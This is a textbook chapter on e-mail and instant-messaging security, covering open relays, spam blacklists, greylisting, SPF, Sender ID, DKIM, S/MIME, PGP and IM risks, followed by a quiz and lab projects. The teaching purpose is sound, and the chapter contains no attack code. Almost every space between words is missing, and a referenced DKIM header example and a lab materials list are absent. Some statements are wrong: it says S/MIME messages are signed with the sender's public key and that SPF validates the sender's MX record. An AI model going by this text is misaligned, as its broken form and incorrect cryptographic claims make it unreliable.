Thefrontlineofthewaragainstspame-mailisfiltering.Almostalle-mailprovidersfilterspamatsomelevel;however,bandwidthisstillusedtosendthespam,andtherecipiente-mailserverstillhastoprocessthemessage.Toreducespam,itmustbefoughtonseveralfronts.Thefirstthingtodoiseducateusersaboutspam.AgoodwayforuserstofightspamistobecautiousaboutwhereontheInternettheyposttheire-mailaddress.However,youcan’tkeepe-mailaddressessecretjusttoavoidspam.OneofthestepsthatthemajorityofsystemadministratorsrunningInternete-mailservershavetakentoreducespam,andwhichisalsoagoode-mailsecurityprinciple,istoshutdownmailrelaying.Portscanningoccursacrossallhostsallthetime,typicallywithasinglehost
scanninglargesubnetsforasingleport,andsomeofthesepeoplecouldbeattemptingtosendspame-mail.WhentheyscanforTCPport25,theyarelookingforSMTPservers,andoncetheyfindahostthatisanopenrelay(amailserverthatwillacceptmailfromanyone),theycanusethathosttosendasmanycommerciale-mailsaspossible.Thereasonthattheylookforanopenrelayisthatspammerstypicallydonotwantthee-mailstracedbacktothem.Mailrelayingissimilartodroppingaletteroffatapostofficeinsteadoflettingthepostalcarrierpickitupatyourmailbox.OntheInternet,thatconsistsofsendinge-mailfromaseparateIPaddress,makingitmoredifficultforthemailtobetracedbacktoyou.SMTPserversoftwareistypicallyconfiguredtoacceptmailonlyfromspecifichostsordomains.AllSMTPsoftwarecanandshouldbeconfiguredtoacceptonlymailfromknownhosts,ortoknownmailboxes;thisclosesdownmailrelayingandhelpstoreducespam.
TechTip
OpenRelaysConfiguremailrelayoptionscarefullytoavoidbeinganopenrelay.AllmailservershaveanoptionwhereyoucanspecifywhichdomainsorIPaddressesyourmailserverwillrelaymailfor.It’sveryimportanttoconfigureyourmailrelayparametertobeveryrestrictivesothatyourserverdoesnotbecomeagatewayforspammingothers,possiblyresultinginyourservergettingblacklisted.
Sinceitmaynotbepossibletocloseallmailrelays,andbecausesomespammerswillmailfromtheirownmailservers,softwaremustbeusedtocombatspamattherecipient’send.Spamcanbefilteredattwoplaces:atthehostitselforattheserver.Filteringspamatthehostlevelisdonebythee-mailclientsoftwareandusuallyemploysbasicpatternmatching,focusingonthesender,subject,ortextofthee-mail.Thisfairlyeffectivesystemusesaninordinateamountofbandwidthandprocessingpoweronthehostcomputer,however.Theseproblemscanbesolvedbyfilteringspamatthemailserverlevel.Manycompaniesofferadedicatedappliance
designedasaspecialtye-mailserverwiththeprimarytaskoffilteringspam.Thisservertypicallyusesacombinationoftechniqueslistedhere.Italsoimplementsaninternaldatabasetoallowmoregranularfilteringbaseduponspamtheappliancehasalreadyseen.
TryThis!TestingYourMailServerforOpenRelayMakenoteofyoure-mailserversettings,andthentrytosendregularSMTPmailwhenyouareonadifferentnetwork,suchastheWi-FinetworkatacoffeeshoporothersimilaropenaccessInternetconnection.Youshouldgetanerrorrefusingrelaying.Ifthemailgoesthrough,thatservermighthaveamisconfiguration.
TechTip
DNSBLReferenceTheDNSBLprocessisdetailedmorethoroughlyatwww.dnsbl.com.
Theserver-basedapproachcanbebeneficialbecauseothermethodsoffilteringspamcanbeusedattheserver:patternmatchingisstillused,butSMTPsoftwarecanalsouseaprocesscalledDomainNameService(DNS)blacklisting,orDNSBL.TheReal-timeBlackholeList(RBL)wasthefirstlisttoutilizetheconceptofusingDNSrecordstofilter,or“blackhole,”spam-sendingIPaddressesanddomains.Startedin1997,thislistwasandismaintainedinrealtimespecificallyforblockingspame-mail.WhiletheRBLwasthefirstDNSBL,therearenowmanyblackholelists.TheDNSBLserviceissopopularthatmanyprograms,suchassendmail,Postfix,andEudoraInternetMailServer,includesupportforitbydefault.InadditiontotheRBL,multipleotherDNS-basedblacklistservicescan
assistfilteringbaseduponDNSsourcesofmail.Commercialpackagescanblockspamattheserverlevelusingbothmethodsmentioned,maintaining
theirownblacklistsandpattern-matchingalgorithms.Manyadditionaltechniquesexistforserver-basedspamfiltering—
enoughtofillanentirebookonthesubject.Onetechniqueistouseachallenge/responsesystem:onceane-mailisreceivedbya“new”contact,achallengeissentbacktotheoriginatingaddresstoconfirmthecontact.Sincespammerssende-mailsinbulk,theresponsemechanismistoocumbersomeandtheywillnotrespond.Anothertechniqueisknownasgreylisting.Whenane-mailisreceived,
itisbouncedasatemporaryrejection.SMTPserversthatareRFC5321–compliantwillwaitaconfigurableamountoftimeandattemptretransmissionofthemessage.Obviously,spammerswillnotretrysendingofanymessages,sospamisreduced.
Allthesetechniqueshaveadvantagesanddisadvantages,andmostpeoplewillrunsomecombinationoftechniquestoattempttofilterasmuchspamaspossiblewhilenotrejectinglegitimatemessages.Asidebenefitoffilteringspamatthereceivingserverisreducede-mail.
Inenterprises,performingbackupsofinformationisasignificanttask.Backupsaresizedependent,bothincostandtime,andreducinge-mailbyeliminatingspamcanhavesignificantimpactsone-mailbackups.Spamreductionwillalsohaveasignificantimpactonthee-discoveryprocess,asitreducesthequantityofmaterialthatneedstobesearched.E-discoveryisatermforelectronicdiscovery,theelectroniccomponentofalegaldiscoveryprocess.Thediscoveryprocessiscourtmandatedand,whenappliedtoacorporateenvironment,cancausetheshutdownofcorporateoperationsuntiltheprocessiscomplete.Forthisreason,anythingthatmakestheprocesseasierorfasterwillbenefitthecorporation.
TechTip
ActivateReverseDNStoBlockBogusSendersMessagingsystemsuseDNSlookupstoverifytheexistenceofe-maildomainsbeforeacceptingamessage.AreverseDNSlookupisanoptionforfightingoffbogusmailsenders,asitverifiesthesender’saddressbeforeacceptingthee-mail.ReverseDNSlookupactsbyhavingSMTPverifythatthesender’sIPaddressmatchesboththehostanddomainnamesthatweresubmittedbytheSMTPclientintheEHLO/HELOcommand.Thisworksbyblockingmessagesthatfailtheaddress-matchingtest,suggestingthattheydidnotcomefromwheretheysaytheycamefrom.
SpamURIReal-timeBlockListsSpamURIReal-timeBlockLists(SURBL)detectsunwantede-mailbasedoninvalidormaliciouslinkswithinamessage.UsingaSURBLfilterisavaluabletooltoprotectusersfrommalwareandphishingattacks.NotallmailserverssupportSURBL,butthistechnologyshowspromiseinthefightagainstmalwareandphishing.
SenderIDFrameworkMicrosoftoffersanotherserver-basedsolutiontospam,calledtheSenderIDFramework(SIDF).SIDFattemptstoauthenticatemessagesbycheckingthesender’sdomainnameagainstalistofIPaddressesauthorizedtosende-mailbythedomainnamelisted.Thislistismaintainedinatext(TXT)recordpublishedbytheDNS,calledaSenderPolicyFramework(SPF)record.Sowhenamailserverreceivesane-mail,itwillcheckthesender’sdomainnameintheDNS;iftheoutboundserver’sIPmatches,themessagegetsa“pass”ratingbySIDF.Thisissimilartotheideathatroutersshoulddropanyoutboundport25trafficthatdoesnotcomefromknowne-mailserversonthesubnetmanagedbytherouter.However,theSIDFsystemhandlestheauthenticationofthee-mailserverwhenitisreceived,notwhenitissent.Thissystemstillallowswastedbandwidthfromthesenderofthemessagetothereceiver,andsincebandwidthisincreasinglyameteredservice,thismeansthecostofspamisstillpaidbytherecipient.TheSPFcheckensuresthatthesendingMTAisallowedtosendmailonbehalfofthesender’sdomainname.WhenSPFisactivatedonyourserver,thesendingserver’sMXrecord(theDNSMailExchangerecord)isvalidatedbeforemessagetransmissiontakesplace.Thesemethodscantakecareofupto90percentofthejunkmail
cloggingournetworks,buttheycannotstopitentirely.Bettercontrolofport25trafficisrequiredtoslowthetideofspamhittingourin-boxes.Thiswouldstopspammersusingremoteopenrelaysand,hopefully,preventmanyusersfromrunningunauthorizede-mailserversoftheirown.Becauseofthelowcostofgeneratingspam,untilseriousactionistaken,orspamissomehowmadeunprofitable,itwillremainwithus.
DomainKeysIdentifiedMailDomainKeysIdentifiedMail(DKIM)isane-mailvalidationsystememployedtodetecte-mailspoofing.DKIMoperatesbyprovidinga
mechanismtoallowreceivingMTAstocheckthatincomingmailisauthorizedandthatthee-mail(includingattachments)hasnotbeenmodifiedduringtransport.Itdoesthisthroughadigitalsignatureincludedwiththemessagethatcanbevalidatedbytherecipientusingthesigner’spublickeypublishedintheDNS.DKIMistheresultofthemergingoftwopreviousmethods,DomainKeysandIdentifiedInternetMail.DKIMisthebasisforaseriesofIETFstandards-trackspecificationsandisusedbyAOL,Gmail,andYahoomail.AnymailfromtheseorganizationsshouldcarryaDKIMsignatureThefollowingisanexampleoftheDKIMinformationthatisinane-
mailheader:
Thetwosignatures,bandbh,areforthemessageitself,headerandbody,andtheheaderonly.
MailEncryptionThee-mailconcernsdiscussedsofarinthischapterareallglobalissuesinvolvingsecurity,bute-mailsuffersfromamoreimportantsecurityproblem—thelackofconfidentiality,or,asitissometimesreferredto,privacy.AswithmanyInternetapplications,e-mailhasalwaysbeenaplaintextprotocol.WhenmanypeoplefirstgotontotheInternet,theyheardastandardlectureaboutnotsendinganythingthroughe-mailthattheywouldn’twantpostedonapublicbulletinboard.Partofthereasonfor
thiswasthate-mailissentwiththecleartextofthemessageexposedtoanyonewhoissniffingthenetwork.Anyattackeratachokepointinthenetworkcouldreadalle-mailpassingthroughthatnetworksegment.Sometoolscanbeusedtosolvethisproblembyusingencryptionon
thee-mail’scontent.ThefirstmethodisS/MIMEandthesecondisPGP.
S/MIMESecure/MultipurposeInternetMailExtensions(S/MIME)isasecureimplementationoftheMIMEprotocolspecification.MIMEwascreatedtoallowInternete-mailtosupportnewandmorecreativefeatures.Theoriginale-mailRFCspecifiedonlytexte-mail,soanynontextdatahadtobehandledbyanewspecification—MIME.MIMEhandlesaudiofiles,images,applications,andmultiparte-mails.MIMEallowse-mailtohandlemultipletypesofcontentinamessage,includingfiletransfers.Everytimeyousendafileasane-mailattachment,youareusingMIME.S/MIMEtakesthiscontentandspecifiesaframeworkforencryptingthemessageasaMIMEattachment.
CrossCheckX.509CertificatesInChapter7youlearnedaboutX.509certificatestandards.Whyisitimportanttohaveastandardizedcertificateformat?
S/MIMEwasdevelopedbyRSADataSecurityandusestheX.509formatforcertificates.Thespecificationsupportsboth40-bitRC2and3DESforsymmetricencryption.Theprotocolcanaffectthemessageinoneoftwoways:thehostmailprogramcanencodethemessagewithS/MIME,ortheservercanactastheprocessingagent,encryptingallmessagesbetweenservers.Thehost-basedoperationstartswhentheuserclicksSend;themail
agentthenencodesthemessageusingthegeneratedsymmetrickey.Then
thesymmetrickeyisencodedwiththeremoteuser’spublickeyforconfidentialityorsignedwiththelocaluser’sprivatekeyforauthentication/nonrepudiation.Thisenablestheremoteusertodecodethesymmetrickeyandthendecrypttheactualcontentofthemessage.Ofcourse,allofthisishandledbytheuser’smailprogram,requiringtheusersimplytotelltheprogramtodecodethemessage.Ifthemessageissignedbythesender,itwillbesignedwiththesender’spublickey,guaranteeingthesourceofthemessage.Thereasonthatbothsymmetricandasymmetricencryptionareusedinthemailistoincreasethespeedofencryptionanddecryption.Asencryptionisbasedondifficultmathematicalproblems,ittakestimetoencryptanddecrypt.Tospeedthisup,themoredifficultprocess,asymmetricencryption,isusedonlytoencryptarelativelysmallamountofdata,thesymmetrickey.Thesymmetrickeyisthenusedtoencrypttherestofthemessage.TheS/MIMEprocessofencryptinge-mailsprovidesintegrity,privacy,
and,ifthemessageissigned,authentication.Severalpopulare-mailprogramssupportS/MIME,includingthepopularMicrosoftproductsOutlookandWindowsMail.TheybothmanageS/MIMEkeysandfunctionsthroughtheE-mailSecurityscreen,showninFigure16.7.ThisfigureshowsthedifferentsettingsthatcanbeusedtoencryptmessagesanduseX.509digitalcertificates.Thisallowsinteroperabilitywithwebcertificates,andtrustedauthoritiesareavailabletoissuethecertificates.Trustedauthoritiesareneededtoensurethesendersarewhotheyclaimtobe,animportantpartofauthentication.InWindowsMail,thewindowissimpler(seeFigure16.8),butthesamefunctionsofkeymanagementandsecuree-mailoperationareavailable.
•Figure16.7S/MIMEoptionsinOutlook
•Figure16.8S/MIMEoptionsinWindowsMail
CrossCheckSymmetricEncryptionInChapter5youlearnedaboutsymmetricencryption,includingRC2andthe3DESalgorithmssupportedbyS/MIME.WhatpartoftheCIAofsecuritydoessymmetricencryptionattempttoprovideinthisinstance?
WhileS/MIMEisagoodandversatileprotocolforsecuringe-mail,itsimplementationcanbeproblematic.S/MIMEallowstheusertoselectlow-strength(40-bit)encryption,whichmeansausercansendamessagethatisthoughttobesecurebutthatcanbemoreeasilydecodedthanmessagessentwith3DESencryption.Also,aswithanyprotocol,bugscanexistinthesoftwareitself.Justbecauseanapplicationisdesignedforsecuritydoesnotmeanthatit,itself,issecure.Despiteitspotentialflaws,however,S/MIMEisatremendousleapinsecurityoverregulare-mail.
PGPPrettyGoodPrivacy(PGP)implementse-mailsecurityinasimilarfashiontoS/MIME,butPGPusescompletelydifferentprotocols.Thebasicframeworkisthesame:Theusersendsthee-mail,andthemailagentappliesencryptionasspecifiedinthemailprogram’sprogramming.Thecontentisencryptedwiththegeneratedsymmetrickey,andthatkeyisencryptedwiththepublickeyoftherecipientofthee-mailforconfidentiality.Thesendercanalsochoosetosignthemailwithaprivatekey,allowingtherecipienttoauthenticatethesender.Currently,PGPsupportspublickeyinfrastructure(PKI)providedbymultiplevendors,includingX.509certificatesandLightweightDirectoryAccessProtocol(LDAP)keysourcessuchasMicrosoft’sActiveDirectory.InFigure16.9,youcanseehowPGPmanageskeyslocallyinitsown
software.Thisiswhereauserstoresnotonlylocalkeys,butalsoanykeysthatwerereceivedfromotherusers.AfreekeyserverisavailableforstoringPGPpublickeys.PGPcangenerateitsownkeysusingeither
Diffie-HellmanorRSA,anditcanthentransmitthepublickeystothePGPLDAPserversootherPGPuserscansearchforandlocateyourpublickeytocommunicatewithyou.Thiskeyserverisconvenient,aseachpersonusingPGPforcommunicationsdoesnothavetoimplementaservertohandlekeymanagement.Fortheactualencryptionofthee-mailcontentitself,PGPsupportsInternationalDataEncryptionAlgorithm(IDEA),3DES,andCarlisleAdamsandStaffordTavares(CAST)forsymmetricencryption.PGPprovidesprettygoodsecurityagainstbrute-forceattacksbyusinga3DESkeylengthof168bits,anIDEAkeylengthof128bits,andaCASTkeylengthof128bits.Allofthesealgorithmsaredifficulttobrute-forcewithexistinghardware,requiringwelloveramillionyearstobreakthecode.Whilethisisnotapromiseoffuturesecurityagainstbrute-forceattacks,thesecurityisreasonabletoday.
•Figure16.9PGPkeymanagement
PGPhasplug-insformanypopulare-mailprograms,includingOutlookandMozilla’sThunderbird.Theseplug-inshandletheencryptionanddecryptionbehindthescenes,andallthattheusermustdoisentertheencryptionkey’spassphrasetoensurethattheyaretheownerofthekey.InFigure16.10,youcanseethestringofencryptedtextthatmakesuptheMIMEattachment.Thistextincludestheencryptedcontentofthemessageandtheencryptedsymmetrickey.Youcanalsoseethattheprogramdoesnotdecryptthemessageuponreceipt;itwaitsuntilinstructedtodecryptit.PGPalsostoresencryptedmessagesintheencryptedformat,asdoesS/MIME.Thisisimportant,sinceitprovidesend-to-endsecurityforthemessage.
•Figure16.10DecodingaPGP-encodedmessage
LikeS/MIME,PGPisnotproblem-free.Youmustbediligentaboutkeepingthesoftwareuptodateandfullypatched,becausevulnerabilitiesareoccasionallyfound.Forexample,abufferoverflowwasfoundinthewayPGPwashandledinOutlook,causingtheoverwritingofheapmemoryandleadingtopossiblemaliciouscodeexecution.ThereisalsoalotofdiscussionaboutthewayPGPhandleskeyrecovery,orkeyescrow.PGPuseswhat’scalledanAdditionalDecryptionKey(ADK),whichisbasicallyanadditionalpublickeystackedupontheoriginalpublickey.AnADK,intheory,wouldgivetheproperorganizationaprivatekeythatwouldbeusedtoretrievethesecretmessages.Inpractice,theADKisnotalwayscontrolledbyaproperlyauthorizedorganization,andthedangerexistsforsomeonetoaddanADKandthendistributeittotheworld.Thiscreatesasituationinwhichotheruserswillbesendingmessagesthattheybelievecanbereadonlybythefirstparty,butthatcanactuallybereadbythethirdpartywhomodifiedthekey.Thesearejustexamplesofthecurrentvulnerabilitiesintheproduct,showingthatPGPisjustatool,nottheultimateanswertosecurity.
InstantMessagingInstantmessaging(IM)isanothertechnologythathasseenwidespreadacceptanceinrecentyears.WiththegrowthoftheInternetpullingcustomersawayfromAOL,oneofthelargestdial-upprovidersintheUnitedStates,thecompanyhadtolookatnewwaysofprovidingcontent.ItstartedAOLInstantMessenger(AIM),whichwasconceivedasawaytofindpeopleoflikeinterestsonline,anditwasmodeledafterearlierchatprograms.WithGUIfeaturesandenhancedeaseofuse,itquicklybecamepopularenoughforAOLtoreleasetoregularusersoftheInternet.Alongwithseveralcompetingprograms,AIMwasfeedingthetremendousgrowthoftheinstantmessagingsegment.Theprogramshadtoappealtoawidevarietyofusers,soeaseofuse
wasparamount,andsecuritywasnotapriority.NowthatpeopleareaccustomedtoIMapplications,theyseethebenefitofusingthemnotonlyforpersonalchattingontheInternet,butalsoforlegitimatebusinessuse.Whenpeopleinstalltheseapplications,theyunwittinglyexposethecorporatenetworktosecuritybreachesthroughmanyofthesamemalicioussoftwareproblemsase-mail.InstantmessagestraversetheInternetinplaintextandalsocrossthird-partyservers—beitYahoo,Skype,Google,orAOL.
IMprogramsaredesignedtoattachtoaserver,oranetworkofservers,andallowyoutotalkwithotherpeopleonthesamenetworkofserversinnearrealtime.Thenatureofthistypeofcommunicationopensseveralholesinasystem’ssecurity.First,theprogramhastoattachtoaserver,typicallyannouncingtheIPaddressoftheoriginatingclient.Thisisnotaprobleminmostapplications,butIMidentifiesaspecificuserassociated
withtheIPaddress,makingattacksmorelikely.Alsoassociatedwiththisfactisthatforotheruserstobeabletosendyoumessages,theprogramisforcedtoannounceyourpresenceontheserver.SonowauserisdisplayingthathisorhercomputerisonandispossiblybroadcastingthesourceIPaddresstoanyonewhoislooking.Thisproblemiscompoundedbythetendencyforpeopletoruntheseprogramsinthebackgroundsothattheydon’tmissanymessages.PopularIMclientswerenotimplementedwithsecurityinmind.All
supportsendingfilesasattachments,fewcurrentlysupportencryption,andcurrentlynonehaveavirusscannerbuiltintothefile-sharingutility.
Filesharinginanyformmustbeacarefullyhandledapplicationtopreventthespreadofvirusesandothermaliciouscode.Chatprogramsproducesecurityrisks,becausethesharingisdoneadhocbetweenendusers,administratorshavenocontroloverthequalityofthefilesbeingsent,andthereisnomonitoringoftheoriginalsourcesofthosefiles.The
onlyauthenticationforthefilesisthehumaninteractionbetweenthetwousersinquestion.ThiskindofvulnerabilitycoupledwithasocialengineeringattackcanproducedramaticenoughresultsthattheCERTCoordinationCenter(CERT/CC)wascompelledtoissueanincidentnote(CERTIncidentNoteIN-2002-03:SocialEngineeringAttacksviaIRCandInstantMessaging).Thispersonaltypeofauthenticationwasabused,trickingpeopleintodownloadingandexecutingbackdoororTrojanhorseprograms.Ausercanalsobepersuadedautonomouslytodownloadandrunafile
viaIM.Severalwormsexistthatattempt,viaIM,togetuserstodownloadandrunthepayload.W32.pipelineusesAIMtoinstallarootkit.Goner,runningviaICQ,anotherIMprogram,asksuserstodownloadascreensaver.Choke,spreadingviaMSN/WindowsLiveMessenger,attemptstogetuserstodownloadagame;ifthegameisdownloaded,thewormattemptstospreadtoanyusertheinfecteduserchatswith.Thesewormsandothersalldependonuserinteractiontorunthepayload.Thisfile-sharingmechanismbypassesalltheserver-sidevirusprotectionthatispartofmostorganizations’e-mailinfrastructure.Thispushesmoreoftheresponsibilityformalwareprotectionontothelocalusers’antivirussystem.Thiscanbeproblematicforuserswhodonotregularlyupdatetheirsystemsorwhofailtoperformregularantivirusscans.
TechTip
TrillianAnIMclientthatsupportsencryptionaswellasallthepopularnetworkslikeAIM,Yahoo,andSkypeisTrillian.Trillianisavailableatwww.trillian.im.
OneofthelargestproblemswithIMprogramsisthelackofsupportforencryption.AIM,ICQ,Skype,andYahooMessengerallcurrentlydonotnativelysupportencryptionofthetextmessagestravelingbetweenusers.However,somethird-partyprogramswilladdencryptionasaplug-in.The
lackofencryptionwasnotasignificantconcernwhiletheseIMprogramswerestillusedprimarilyforpersonalcommunication,butwithbusinessesmovingtoadoptthesystems,peoplearenotawareoftheinfrastructuredifferencebetweenIMande-mail.Intracompanye-mailneverleavesthecompany’snetwork,butanintracompanyinstantmessagetypicallywilldosounlesstheorganizationpurchasesaproductandoperatesaninternalIMserver.Thiscananddoesexposelargeamountsofconfidentialbusinessinformationtoanyonewhoisphysicallyinaspottomonitorandhasthedesiretocapturethetraffic.Ifyouthinkabouthowoftenclientinformationissentviae-mail
betweentwopeopleatacompany,youstarttoseethedangerthatsendingitviaIMcreates.IMisanapplicationthatistypicallyinstalledbytheenduser,withouttheknowledgeoftheadministrator.Thesetypesofrogueapplicationshavealwaysbeenadangertoanetwork’ssecurity,butadministratorshavetypicallybeenabletocontrolthembyeliminatingtheapplications’portsthroughthefirewall.TheprotocolsusedforthesechatapplicationshavedefaultTCPports—
AIMuses5190,Jabberuses5222and5269,YahooMessengeruses5050,andMSN/WindowsLiveMessengeruses1863.SomeIMapplicationshavebeenprogrammedforuseasrogueapps.Intheeventthattheycan’treachaserveronthedefaultports,theybegintoscanallportslookingforonethatisallowedoutofthefirewall.Astheseapplicationscanconnectonanyport,includingcommononessuchasTelnetport23andHTTPport80,theyareveryhardtocontrol.ThesetypesofsecurityrisksgoaboveandbeyondtheroutinesecurityholesgeneratedinIMsoftwarethatariseasinanyotherpieceofsoftware,throughcodingerrors.
TechTip
SecuringIMTipstohelpsecurecorporateIM:
RunacorporateIMserver
Avoidfiletransfers
Useencryption
ModernInstantMessagingSystemsInstantmessagingisanapplicationthatcanincreaseproductivitybysavingcommunicationtime,butit’snotwithoutrisks.Theprotocolsendsmessagesinplaintextandthusfailstopreservetheirconfidentiality.Italsoallowsforsharingoffilesbetweenclients,allowingabackdooraccessmethodforfiles.Therearesomemethodstominimizesecurityrisks,butmoredevelopmenteffortsarerequiredbeforeIMisreadytobeimplementedinasecurefashion.ThebestwaysinwhichtoprotectyourselfonanIMnetworkaresimilartothoseforalmostallInternetapplications:avoidcommunicationwithunknownpersons,avoidrunninganyprogramyouareunsureof,anddonotwriteanythingyouwouldn’twantpostedwithyournameonit.Instantmessagingalsoplaysaroleintoday’ssocialmedia–driven
world.Therearemanyverypopular“messagingsystems”thatareinpopularusetoday,includingSnapchat,Instagram,Jabber,Tumblr,WhatsApp,andmore.Theseareinstantsharingsystemsthatallowuserbasestosharefiles,pictures,andvideosbetweenusers.Eachofthesesystemshaslargenumbersofusersandliterallybillionsoftransferreditemseveryyear.AsthesocialaspectoftheWebgrows,sodotheinstantsharingsystemsconnectingusersinsocialwebs.Applehasitsownmessagingservice,asdoesAndroid,andappsexistforawiderangeofdifferent“messaging”systems.Anylistofmessagingappsisonethatwillbecomeoutdatedrather
rapidly,butatthetimethisbookgoestopressthelistwouldincludethefollowing:
LINE
Viber
WhatsApp(nowpartofFacebook)
FacebookMessenger
Snapchat
Kik
Tango
Jabber
Tumblr
Themainsecuritythreatonmostoftheseisinformationdisclosure.Astheycanbeusedfrommobiledevicesoutsideofanenterprisenetwork,thereisthepossibilityforinformationtobecapturedandreleasedacrosstheseplatforms.Forthisreason,oneofthesecuritypoliciesofhigh-securityfacilitiesistonotallowpersonaldevices.
Chapter16Review
LabManualExercisesThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providepracticalapplicationofmaterialcoveredinthischapter:
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboute-mailandIMsecurity.
Describesecurityissuesassociatedwithe-mail
Maliciouscodeiscodethatperformssomethingharmfultothecomputeritrunson.Maliciouscodeisoftensentthroughe-mail.
Virusesarepiecesofmaliciouscodethatrequireuseractiontospread.
Trojanprogramsdeceivetheuserintothinkingthataprogramissomethinginnocuous,whenitisactuallyapieceofmaliciouscode.
Wormsarepiecesofmaliciouscodethatuseautomatedmethodstospread.
Spam,orunsolicitedcommerciale-mail,ise-mailthatissenttoyouwithoutyourrequestingit,attemptingtosellyousomething.Itistheelectronicequivalentofatelemarketingcall.
Hoaxe-mailsaree-mailsthattravelfromusertouserbecauseofthecompellingstorycontainedinthem.
Implementsecuritypracticesfore-mail
Protectingyoure-mailsystemfromviruscoderequiresseveralmeasures:
Don’texecuteanyattachmentfromanunknownsource.
Useantivirusprogramsthatrunontheservertofilteralle-mails.
Useclient-sideantivirusprogramstocatchanyvirusesthatmightcomefromweb-basede-mailaccounts.
Keepingallsoftwareuptodatehelpstopreventwormpropagation.
Server-sidefilteringsoftwareandtheapplicationofspamblackholelistshelplimittheamountofunsolicitede-mail.
E-mailencryptionisagreatwaytoprotecttheprivacyofcommunicationsincee-mailisacleartextmedium.
PGP,orPrettyGoodPrivacy,isagoodspecificapplicationfore-mailencryption.
S/MIME,orSecure/MultipurposeInternetMailExtension,isthee-mailprotocolthatallowsencryptionapplicationstowork.
Antivirussoftwareisimportanttoprotectagainstmalware.
Detailthesecurityissuesofinstantmessagingprotocols
AOLInstantMessenger,ICQ,andSkypearealldifferentversionsofinstantmessagingprograms.
ThemostpopularIMprogramsallsendmessagesintheclear,withoutanativeencryptionbuiltintothedefaultclients.
AlltheIMclientsneedtoattachtoaservertocommunicate.Therefore,whenattachedtotheserver,theyannouncethesourceIPofaparticularuser.
Instantmessagingcanalsotransferfiles.Thisactivitytypicallybypassesanysecuritybuiltintothenetwork,especiallymailservervirusprotections.
KeyTerms
AOLInstantMessenger(AIM)(522)botnet(514)DomainKeysIdentifiedMail(DKIM)(517)e-mail(505)e-mailhoax(509)encryption(518)instantmessaging(IM)(510)maildeliveryagent(MDA)(506)mailrelaying(515)mailtransferagent(MTA)(506)mailuseragent(MUA)(506)MultipurposeInternetMailExtensions(MIME)(508)openrelay(515)PrettyGoodPrivacy(PGP)(520)Real-timeBlackholeList(RBL)(515)Secure/MultipurposeInternetMailExtensions(S/MIME)(518)SenderIDFramework(SIDF)(516)SenderPolicyFramework(SPF)(517)SimpleMailTransferProtocol(SMTP)(505)spam(514)unsolicitedcommerciale-mail(514)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.Spamisthepopulartermfor_______________.2._______________isamethodtodetecte-mailspoofing.3.Alargesourceofspamiszombiecomputersthatarepartofa(n)
_______________.
4.________istheprotocolusedtoattachattachmentstoanemail.5.A(n)_______________isacompilationofserversthatareblocked
becausetheyhavebeenknowntosendspam.
6._______________isoneofthemostpopularchatprograms.7._______________isaprotocolforverifyinge-mailaddresses
againstIPaddressestoreducespa,.
8.A(n)_______________isafalsee-mailthattellsacompellingstory,andtypicallypromptstheusertoforwardittootherusers.
9._______________canhavethesamevirusrisksase-mail.10.Themostprevalentprotocolthate-mailissentbyis
_______________.
Multiple-ChoiceQuiz1.Whatisoneofthebiggestreasonsspamisprevalenttoday?
A.Criminalsusezombiebotnets.
B.Regularmailistooslow.
C.Spamispopularamongrecipients.
D.Spamissentfromthegovernment.
2.Whatisspam?A.Unsolicitedcommerciale-mail
B.AUsenetarchive
C.Acomputervirus
D.Anencryptionalgorithm
3.Whyisanopene-mailrelaybad?
A.Itallowsanyonetoremotelycontroltheserver.
B.Itmakesthee-mailserverrebootonceaday.
C.Noe-mailwillgothrough.
D.Itwillallowanyonetosendspamthroughtheserver.
4.Whatmakese-mailhoaxespopularenoughtokeepthesamestoryfloatingaroundforyears?
A.Theyarewrittenbyaward-winningauthors.
B.Thestorypromptsactiononthereader’spart.
C.Thestorywillgranttheusergoodluckonlyifheorsheforwardsiton.
D.Thehoaxe-mailforwardsitself.
5.Whatisgreylisting?A.E-mailmessagesaretemporarilyrejectedsothatthesenderis
forcedtoresend.
B.E-mailmessagesarerunthroughastrongsetoffiltersbeforedelivery.
C.E-mailmessagesaresentthroughspecialsecureservers.
D.E-mailissentdirectlyfromthelocalhosttotheremotehost,bypassingserversentirely.
6.Whyareinstantmessagingprotocolsdangerousforfiletransfer?A.Theybypassserver-basedvirusprotections.
B.Filesharingisneverdangerous.
C.Theyalloweveryoneyouchatwithtoviewallyourfiles.
D.You’llendupreceivingmanyspamfiles.
7.WhydoPGPandS/MIMEneedpublickeycryptography?A.Publickeysarenecessarytodeterminewhetherthee-mailis
encrypted.
B.Thepublickeyisnecessarytoencryptthesymmetrickey.
C.Thepublickeyunlocksthepasswordtothee-mail.
D.Thepublickeyisuselessandgivesafalsesenseofprivacy.
8.WhyisHTMLe-maildangerous?A.Itcan’tbereadbysomee-mailclients.
B.Itsendsthecontentofyoure-mailstowebpages.
C.Itcanallowlaunchingofmaliciouscodefromthepreviewpane.
D.Itistheonlywayspamcanbesent.
9.Iftheyarebothtextprotocols,whyisinstantmessagingtrafficriskierthane-mail?
A.MorevirusesarecodedforIM.
B.IMhasnobusinesspurpose.
C.IMtraffichastotraveloutsideoftheorganizationtoaserver.
D.Emoticons.
10.Whatmakesspamsopopularasanadvertisingmedium?A.Itslowcostperimpression
B.Itshighrateofreturn
C.Itsabilitytocanvassmultiplecountries
D.Itsqualityofworkmanship
EssayQuiz1.Howwouldyouimplementasuccessfulspam-filteringpolicy?2.Draftamemodescribingmalwareriskstothecommonuserand
whattheusercandotoavoidinfection.
LabProjects
•LabProject16.1Showthatinstantmessagingisaninsecureprotocol.YouwillneedalabcomputerwithWindowsinstalled,anIMprogram,andasniffer.Thendothefollowing:
1.IfyouneedtoinstallanIMprogram,downloadAIMfromwww.aim.com.2.RuntheInstallerprogram.
3.Generateausernameandpasswordandlogin.4.Startthesnifferprogramandsetittocapturealltraffic.
5.Startachatsessionwithapartnerintheclass.6.Decodethesnifftracetoviewthecleartextmessagesofthechat.
•LabProject16.2Findatleasttenpiecesofspammailfromanyaccount,whetheritbehome,work,school,orsomethingelse.Usingthee-mailheaders,andanywebsitethatmightprovideinformation,attempttotracethespammailbacktoitsoriginalsource.
Youwillneedthefollowingmaterials:
